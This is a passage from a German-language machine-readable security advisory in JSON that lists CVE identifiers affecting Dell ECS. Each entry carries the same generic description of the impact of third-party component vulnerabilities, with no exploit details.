"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3352"
},
{
"cve": "CVE-2022-33740",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-33740"
},
{
"cve": "CVE-2022-33741",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-33741"
},
{
"cve": "CVE-2022-33742",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-33742"
},
{
"cve": "CVE-2022-33972",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-33972"
},
{
"cve": "CVE-2022-33981",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-33981"
},
{
"cve": "CVE-2022-34169",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-34169"
},
{
"cve": "CVE-2022-3424",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3424"
},
{
"cve": "CVE-2022-34266",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-34266"
},
{
"cve": "CVE-2022-34526",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-34526"
},
{
"cve": "CVE-2022-34903",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-34903"
},
{
"cve": "CVE-2022-3491",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3491"
},
{
"cve": "CVE-2022-3515",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3515"
},
{
"cve": "CVE-2022-3520",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3520"
},
{
"cve": "CVE-2022-3521",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3521"
},
{
"cve": "CVE-2022-3524",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3524"
},
{
"cve": "CVE-2022-35252",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-35252"
},
{
"cve": "CVE-2022-3542",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3542"
},
{
"cve": "CVE-2022-3545",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3545"
},
{
"cve": "CVE-2022-3564",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3564"
},
{
"cve": "CVE-2022-3565",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3565"
},
{
"cve": "CVE-2022-3566",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3566"
},
{
"cve": "CVE-2022-3567",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3567"
},
{
"cve": "CVE-2022-35737",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-35737"
},
{
"cve": "CVE-2022-3586",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3586"
},
{
"cve": "CVE-2022-3591",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3591"
},
{
"cve": "CVE-2022-3594",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3594"
},
{
"cve": "CVE-2022-3597",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3597"
},
{
"cve": "CVE-2022-3599",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3599"
},
{
"cve": "CVE-2022-36109",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-36109"
},
{
"cve": "CVE-2022-3621",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3621"
},
{
"cve": "CVE-2022-3626",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3626"
},
{
"cve": "CVE-2022-3627",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3627"
},
{
"cve": "CVE-2022-3628",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3628"
},
{
"cve": "CVE-2022-36280",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-36280"
},
{
"cve": "CVE-2022-3629",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3629"
},
{
"cve": "CVE-2022-3635",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3635"
},
{
"cve": "CVE-2022-3643",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3643"
},
{
"cve": "CVE-2022-36437",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-36437"
},
{
"cve": "CVE-2022-3646",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3646"
},
{
"cve": "CVE-2022-3649",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3649"
},
{
"cve": "CVE-2022-36760",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-36760"
},
{
"cve": "CVE-2022-36879",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-36879"
},
{
"cve": "CVE-2022-36946",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-36946"
},
{
"cve": "CVE-2022-3705",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3705"
},
{
"cve": "CVE-2022-37434",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-37434"
},
{
"cve": "CVE-2022-37436",
"notes": [
{
"category": "description",
